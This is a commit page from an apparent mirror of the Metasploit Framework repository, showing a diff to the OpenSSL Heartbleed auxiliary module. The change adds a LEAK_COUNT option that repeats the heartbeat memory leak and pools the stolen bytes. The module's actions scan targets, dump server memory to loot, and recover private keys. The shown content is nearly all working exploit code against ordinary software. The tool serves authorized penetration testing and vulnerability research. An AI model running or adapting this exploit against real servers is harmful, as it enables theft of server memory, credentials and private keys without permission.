infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10680, LEAK_COUNT option for Heartbleed

4.x
William Vu 2018-09-20 20:15:48 -05:00 committed by Metasploit
parent 858b67f943
commit 7ef006fcf9
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 27 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
View File

@ -109,8 +109,12 @@ class MetasploitModule < Msf::Auxiliary
STARTTLS may also be vulnerable.
The module supports several actions, allowing for scanning, dumping of
memory contents, and private key recovery. The `repeat` command can be
used to make running the `DUMP` many times more convenient. As in:
memory contents to loot, and private key recovery.
The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.
The repeat command can be used to make running the SCAN or DUMP many
times more powerful. As in:
repeat -t 60 run; sleep 2
To run every two seconds for one minute.
},
@ -145,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
'Actions' =>
[
['SCAN', {'Description' => 'Check hosts for vulnerability'}],
['DUMP', {'Description' => 'Dump memory contents'}],
['DUMP', {'Description' => 'Dump memory contents to loot'}],
['KEYS', {'Description' => 'Recover private keys from memory'}]
],
'DefaultAction' => 'SCAN',
@ -161,9 +165,10 @@ class MetasploitModule < Msf::Auxiliary
OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),
OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),
OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]),
OptInt.new('STATUS_EVERY', [true, 'How many retries until key dump status', 5]),
OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),
OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10])
OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])
])
register_advanced_options(
@ -207,10 +212,17 @@ class MetasploitModule < Msf::Auxiliary
# Main method
def run_host(ip)
case action.name
when 'SCAN'
loot_and_report(bleed)
when 'DUMP'
loot_and_report(bleed) # Scan & Dump are similar, scan() records results
# SCAN and DUMP are similar, but DUMP stores loot
when 'SCAN', 'DUMP'
# 'Tis but a scratch
bleeded = ''
1.upto(leak_count) do |count|
vprint_status("Leaking heartbeat response ##{count}")
bleeded << (bleed || '')
end
loot_and_report(bleeded)
when 'KEYS'
get_keys
else
@ -266,6 +278,10 @@ class MetasploitModule < Msf::Auxiliary
datastore['TLS_CALLBACK']
end
def leak_count
datastore['LEAK_COUNT']
end
#
# TLS Callbacks
#
@ -493,13 +509,12 @@ class MetasploitModule < Msf::Auxiliary
# Stores received data
def loot_and_report(heartbeat_data)
unless heartbeat_data
if heartbeat_data.nil? || heartbeat_data.empty?
vprint_error("Looks like there isn't leaked information...")
return
end
print_good("Heartbeat response with leak")
print_good("Heartbeat response with leak, #{heartbeat_data.length} bytes")
report_vuln({
:host => rhost,
:port => rport,
@ -541,7 +556,6 @@ class MetasploitModule < Msf::Auxiliary
# Show abbreviated data
vprint_status("Printable info leaked:\n#{abbreviated_data}")
end
#